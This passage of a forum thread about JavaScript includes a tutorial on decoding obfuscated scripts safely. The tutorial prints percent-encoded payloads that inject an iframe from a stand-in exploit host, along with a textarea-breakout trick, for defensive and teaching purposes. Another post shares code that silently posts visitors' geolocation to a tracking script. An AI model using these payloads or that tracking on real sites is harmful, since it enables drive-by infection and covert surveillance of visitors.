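const A_TAG = /<a(\s(?:"[^"]*"|'[^']*'|[^'">])*)?>/gi;
// name, name="v", name='v' or name=v
const ATTR = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

// Parse the attribute section of a start tag into an ordered list.
function parseAttrs(tagBody) {
  const attrs = [];
  for (const m of tagBody.matchAll(ATTR)) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
    attrs.push({ name: m[1].toLowerCase(), value: value === undefined ? null : value });
  }
  return attrs;
}

// Rebuild the start tag, always double-quoting values.
function serialize(attrs) {
  return '<a' + attrs.map(a => a.value === null
    ? ' ' + a.name
    : ' ' + a.name + '="' + a.value.replace(/"/g, '&quot;') + '"').join('') + '>';
}

// Returns the hardened HTML and the href of every link that had to be fixed.
function hardenBlankLinks(html) {
  const fixed = [];
  const out = html.replace(A_TAG, (tag, body) => {
    const attrs = parseAttrs(body || '');
    const target = attrs.find(a => a.name === 'target');
    if (!target || (target.value || '').trim().toLowerCase() !== '_blank') return tag;

    let rel = attrs.find(a => a.name === 'rel');
    const tokens = rel && rel.value
      ? rel.value.toLowerCase().split(/\s+/).filter(Boolean) : [];
    // noreferrer implies noopener, so either token is enough.
    if (tokens.includes('noopener') || tokens.includes('noreferrer')) return tag;

    if (!rel) { rel = { name: 'rel', value: null }; attrs.push(rel); }
    rel.value = tokens.concat('noopener', 'noreferrer').join(' ');
    const href = attrs.find(a => a.name === 'href');
    fixed.push(href ? href.value : null);
    return serialize(attrs);
  });
  return { html: out, fixed };
}

// Constructed sample: a webmail message body with four links.
const SAMPLE = [
  '<p><a href="http://mail.example/inbox">Inbox</a>',
  '<a href="http://trap.example/funny.php" target="_blank">funny</a>',
  "<a target='_BLANK' rel='nofollow' href='http://trap.example/2'>two</a>",
  '<a href="http://ok.example/" target="_blank" rel="noopener">ok</a></p>',
].join('\n');

const report = hardenBlankLinks(SAMPLE);
console.log('links fixed:', report.fixed);
console.log(report.html);
```

Run it over stored message bodies or templates; links that already carry `noopener` or `noreferrer`, and links without `target="_blank"`, are returned byte for byte unchanged.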
  18. Today I was thinking of writing an article about how to build your own JavaScript obfuscator: an obfuscator that cannot be decrypted automatically by JSBeautifier or other applications like it (of course, no such thing exists). So I wrote the script that "encrypts" the source code, tested it (in Firefox, Chrome and IE) to see whether I had missed anything, and finally made an HTML page that lets you paste in JavaScript code and "encrypt" it automatically.

    But before writing the article, I decided to check how quick and how attentive you are. After that we'll see what to do about the article: if this subject interests you, I'll gladly write it.

    So, below is a simpler version of the encrypted code. You need to decrypt it very carefully, and once you have the JavaScript source, send me a PM with the source code and the method you used.

    Finalists:
    15-11-2012, 06:23 PM → baltag
    17-11-2012, 07:09 PM → grinder
  19. B7ackAnge7z


    Seeing that there is no post about the Blockly application, I decided to fix this mistake. So, Blockly is a web application that works as a graphical programming editor. To create an application, the user will hardly need the keyboard, but rather a mouse to move and arrange the "blocks" of logical, conditional or loop instructions. A very interesting and useful feature is the ability to export the blocks to JavaScript, Dart or Python.

    For example, the following construction:

    exported to JavaScript, will look like this:

        var msg;
        var Letters;
        var i;

        msg = '';
        Letters = ['R','S','T'].join('');
        for (var i_index in Letters) {
          i = Letters[i_index];
          msg = msg + i;
        }
        window.alert(msg);

    and in Python, like this:

        msg = None
        Letters = None
        i = None

        msg = ''
        Letters = ''.join([str(temp_value) for temp_value in ['R', 'S', 'T']])
        for i in Letters:
          msg = msg + i
        print(msg)

    Those who know Python and/or JavaScript: please don't analyse the examples above.

    As you can well imagine, Blockly is not exactly suited to cracking a Yahoo password or finding vulnerabilities in NASA's servers. On the other hand, Blockly is a perfect application for developing a programmer's logic, or for teachers (and not only them) to use when teaching programming.

    To finish, I suggest Blockly Maze: get out of the maze as efficiently as possible (quickly and using as few logical instructions as possible). Post your answers in the comments, adding a screenshot of the solution. If you end up with more than 12 blocks, you can set the screenshot as your desktop background (and, of course, without publishing the answer here).
  20. Many of you certainly know JavaScript syntax and can write and read a fragment of code in this language, yet you have still come across JavaScript scripts that look indecipherable at first sight. If you are in this group and want to learn a few tricks that will help you decrypt "obfuscated" scripts, I suggest you read this short tutorial. I would also recommend it to those with some experience in the field, because I have often seen them use techniques that are not exactly safe to obtain readable code.

    » What is an obfuscator and what is it used for?

    In case you didn't know, an obfuscator is an application whose purpose is to transform source code into indecipherable code that remains perfectly functional even though the source has been modified and ends up looking like hell. Most often, an obfuscator is used to hide code from "uninvited readers", so that they cannot find out what the script does. An obfuscator is also used to prevent the script from being modified and used without the author's knowledge.

    » The difference between obfuscating and compressing

    Many people think that "obfuscating" and "compressing" code are one and the same thing. Wrong. It is important to know that compression is used to minimise the amount of code (by removing comments, spaces and other unnecessary characters), so compression helps improve the performance of the web application. Obfuscation, on the other hand, does exactly the opposite: to make encrypting the code possible, it increases the amount of code (adding functions, loops, variables, etc.), which considerably reduces the performance of the web application. To see the difference between obfuscating and compressing JavaScript code, I suggest you look at the following examples:

    >> Initial code (263 characters):

        // Check the site address
        if (!window.location.hostname != 'www.site.com') {
            // Warn the user
            alert('Acest site incalcă drepturile de autor');
            // Redirect the user
            window.location.replace('http://www.site.com/');
        }

    >> Compressed code (143 characters):

        if(!window.location.hostname!='www.site.com'){alert('Acest site incalcă drepturile de autor');window.location.replace('http://www.site.com/')}

    >> Obfuscated code (445 characters):

        eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5(!1.2.6!=\'3.0.4\'){7(\'8 0 9ă a b c\');1.2.d(\'e://3.0.4/\')}',15,15,'site|window|location|www|com|if|hostname|alert|Acest|incalc|drepturile|de|autor|replace|http'.split('|'),0,{}))

    As you can see (if you decrypt the obfuscated code), the only similarity between these two processes is that in both cases the JavaScript comments are removed.

    » Why it is dangerous to replace eval() with document.write()

    I have seen many people decode scripts by replacing the eval() function with document.write(), without considering that the encrypted script may boil down to:

        document.write('<iframe src="//xploit/pack"></iframe>');

    For example, if the code above, once encrypted, looks like this:

        eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'));

    and we replace the eval() function with document.write() and run the script in the browser, the iframe will successfully load the content of the page //xploit/pack:

        document.write("document.write('<iframe src=\"//xploit/pack\"></iframe>');");

    That is why you should never use this method (there should be a full stop here) if you are not running the browser in a virtual machine or do not want to send your IP to an unknown server.

    » About JsBeautifier and other similar applications

    When questions about decrypting scripts come up, most people point to JsBeautifier or other sites that offer similar applications. I admit JsBeautifier is a very useful application, but it is very limited and, as a rule, very easy to fool. For example, let's take the example above and modify it slightly:

        var e = eval, u = unescape;
        e(u('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'));

    If you try to decrypt it with JsBeautifier, I'm telling you up front: you will simply be disappointed.

    » Wrong ways of decrypting JavaScript code

    I don't rule out that many will disagree, but I personally consider replacing the eval() function with alert() to be a wrong method (this also applies to console.log() or any similar function). I think so because these functions do not allow the encrypted code to be decrypted quickly, and reading the resulting code is very difficult. Imagine a piece of code 10k characters long that calls eval() more than 100 times: you would certainly need nerves of steel.

    Another wrong method, and a dangerous one too, is adding a line document.write('<textarea>'); before the encrypted code and replacing the eval() function with document.write(). If we take the example above, we get the following code:

        document.write('<textarea>');
        document.write(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'));
        document.write('</textarea>');

    When run, this gives a rather interesting result: a textarea element appears, containing the iframe code:

        <textarea><iframe src="//xploit/pack"></iframe></textarea>

    At first sight nothing dangerous: the iframe did not load anything, and we obtained the code safely without allowing any other functions or lines of code to run. The danger still exists, though, because whoever encrypted the script expected that some people would want to analyse their masterpiece, and will certainly add something like this to the source code:

        // </textarea>

    and, encrypted, the code will look like this:

        document.write(unescape('%2F%2F%20%3C%2F%74%65%78%74%61%72%65%61%3E%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'));

    When run, since HTML does not recognise JavaScript comments, the line // </textarea> will close the <textarea> element's tag and the iframe will successfully load the exploit.

    » Decrypting JavaScript code efficiently and safely

    The method I want to present is one I used some time ago, and it always allowed me to quickly decode practically any encrypted code written in JavaScript. That is why I thought it would be good to write about it, helping the less experienced and protecting them from possible dangers. By the way, it would be nice if you posted comments describing the methods you use.

    So, the method is very simple: we have to redefine the eval() and document.write() functions, and write the data sent to them into a box:

        <!-- Create the box where the data will be saved -->
        <textarea id="js" style="width:80%;height:200px"></textarea>
        <script>
        // Get the textarea element
        var txt = document.getElementById('js');
        // Redefine the functions
        document.write = window.eval = function (str) {
            // Write the code that was supposed to run into the textarea box
            txt.value += str;
            // We don't worry about HTML tags, because
            // the browser takes care of filling in the box correctly
        };
        </script>

    If we compress the code above, we get two lines of code that should always be at hand:

        <textarea id="js" style="width:80%;height:200px"></textarea>
        <script>var txt=document.getElementById('js');document.write=window.eval=function(str){txt.value+=str}</script>

    Of course, if you run into such "tasks" daily, a JavaScript bookmarklet can also be created, to be accessed directly from the browser.

    I do not recommend this method (or any other, for that matter) to those who have no idea what the document.createElement() or {obj}.appendChild() functions do; it would be too dangerous. And in case you are afraid of other functions but still want to decrypt any code written in JavaScript, simply redefine them alongside eval() and document.write().

    Happy and incident-free decrypting.
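Added example (not part of the original post) for the decoding problem in item 20: instead of redefining `eval()` and `document.write()` and running the script, this Node.js code treats the script as text, decodes percent-escaped string literals layer by layer, and flags the `</textarea>` breakout and iframe injection the post describes. It goes beyond the post by handling nested layers and `%uXXXX` escapes; `peel`, `analyze` and the other names are chosen here, and the samples are rebuilt from the post's `//xploit/pack` placeholder.

```javascript
// Added example: peel percent-escaped layers statically. Nothing here calls
// eval(), unescape() or document.write(); the script under analysis is only data.

const STRING_LITERAL = /"((?:[^"\\\n]|\\.)*)"|'((?:[^'\\\n]|\\.)*)'/g;
const ESCAPE = /%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}/g;

// Same mapping unescape() applies: %XX and %uXXXX become one UTF-16 code unit.
function decodePercent(text) {
  return text.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16)));
}

// A literal counts as an encoded layer when at least half of it is escapes.
// This ignores the names of the functions wrapped around it, so renaming
// eval/unescape (the "var e = eval, u = unescape" trick) changes nothing.
function looksEncoded(body) {
  if (body.length < 6) return false;
  const escaped = (body.match(ESCAPE) || []).reduce((n, e) => n + e.length, 0);
  return escaped / body.length >= 0.5;
}

// Returns every decoded layer, outermost first, with its nesting depth.
function peel(source, maxDepth = 8) {
  const layers = [];
  (function walk(text, depth) {
    if (depth >= maxDepth) return;
    for (const m of text.matchAll(STRING_LITERAL)) {
      const body = m[1] !== undefined ? m[1] : m[2];
      if (!looksEncoded(body)) continue;
      const code = decodePercent(body);
      layers.push({ depth: depth + 1, code });
      walk(code, depth + 1);
    }
  })(source, 0);
  return layers;
}

// Patterns worth a second look in decoded layers.
const INDICATORS = [
  ['textarea-breakout', /<\/textarea/i],
  ['iframe-injection', /<iframe\b/i],
  ['document.write', /\bdocument\s*\.\s*write\s*\(/],
  ['nested-eval', /\beval\s*\(/],
];

function analyze(source) {
  const layers = peel(source);
  const findings = new Set();
  for (const { code } of layers) {
    for (const [name, pattern] of INDICATORS) {
      if (pattern.test(code)) findings.add(name);
    }
  }
  return { layers, findings: [...findings] };
}

// Constructed samples, encoded the same way as the snippets in the post.
const PAYLOAD = "document.write('<iframe src=\"//xploit/pack\"></iframe>');";
const encode = s => Array.from(s, c =>
  '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');

const SAMPLES = {
  direct: "eval(unescape('" + encode(PAYLOAD) + "'));",
  aliased: "var e = eval, u = unescape; e(u('" + encode(PAYLOAD) + "'));",
  breakout: "document.write(unescape('" + encode('// </textarea>\n' + PAYLOAD) + "'));",
  nested: "eval(unescape('" + encode("eval(unescape('" + encode(PAYLOAD) + "'))") + "'));",
};

for (const [name, source] of Object.entries(SAMPLES)) {
  const { layers, findings } = analyze(source);
  console.log(name, 'layers:', layers.length, 'findings:', findings.join(', '));
}
```

It handles percent-escaped layers only; packer output of the `eval(function(p,a,c,k,e,r)...` form needs its own decoder.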
  21. Hi, I know this is my first post on this forum, but I need your help. I'm a noob when it comes to Java or jQuery, but I need a function that hides divs. I found several functions on Google, but they require multiple unique ids, and I have to put this inside a foreach, so I can only write one <div class="ex">, from which 5 divs will then be generated dynamically.
  22.

        <script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
        <br>Country Code: <script language="JavaScript">document.write(geoip_country_code());</script>
        <br>Country Name: <script language="JavaScript">document.write(geoip_country_name());</script>
        <br>City: <script language="JavaScript">document.write(geoip_city());</script>
        <br>Region: <script language="JavaScript">document.write(geoip_region());</script>
        <br>Region Name: <script language="JavaScript">document.write(geoip_region_name());</script>
        <br>Latitude: <script language="JavaScript">document.write(geoip_latitude());</script>
        <br>Longitude: <script language="JavaScript">document.write(geoip_longitude());</script>
        <br>Postal Code: <script language="JavaScript">document.write(geoip_postal_code());</script>

    source: http://www.maxmind.com/app/javascript_city

    In theory you are supposed to link to MaxMind if you use it on your site, but I don't think they bother to check...

    EDIT: possible use:

        <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
        <script>
        $(function() {
            // Poll until geoip.js has loaded, then post the lookup results to track.php
            ( detect = ( function() {
                if(typeof geoip_country_code != "function")
                    return setTimeout ( function() { detect(); } , 10);
                $.post("track.php" , {
                    "cc": geoip_country_code(),
                    "cn": geoip_country_name(),
                    "ct": geoip_city(),
                    "re": geoip_region(),
                    "rn": geoip_region_name(),
                    "lat": geoip_latitude(),
                    "long": geoip_longitude(),
                    "pc": geoip_postal_code()
                });
            } ) )();
            // Load geoip.js asynchronously
            var _geoip = document.createElement("script");
            _geoip.src = "//j.maxmind.com/app/geoip.js";
            _geoip.async = true;
            document.body.appendChild(_geoip);
        });
        </script>

    advantages: asynchronous and free...
  23. Greenbytes


    Hi, I'm wondering: apart from HTML and CSS, what else should you know in order to build something decent? Browser scripting - JavaScript and jQuery / AJAX? Server scripting - PHP? Thanks, Greenbytes
  24. JavaScript: The Definitive Guide, Sixth Edition JavaScript: The Good Parts P.S. Douglas Crockford's Javascript
  25. Alex, 26 years old, web developer and system administrator ... I'm always open to new challenges and ideas and, inevitably, always busy with something :) Glad to be here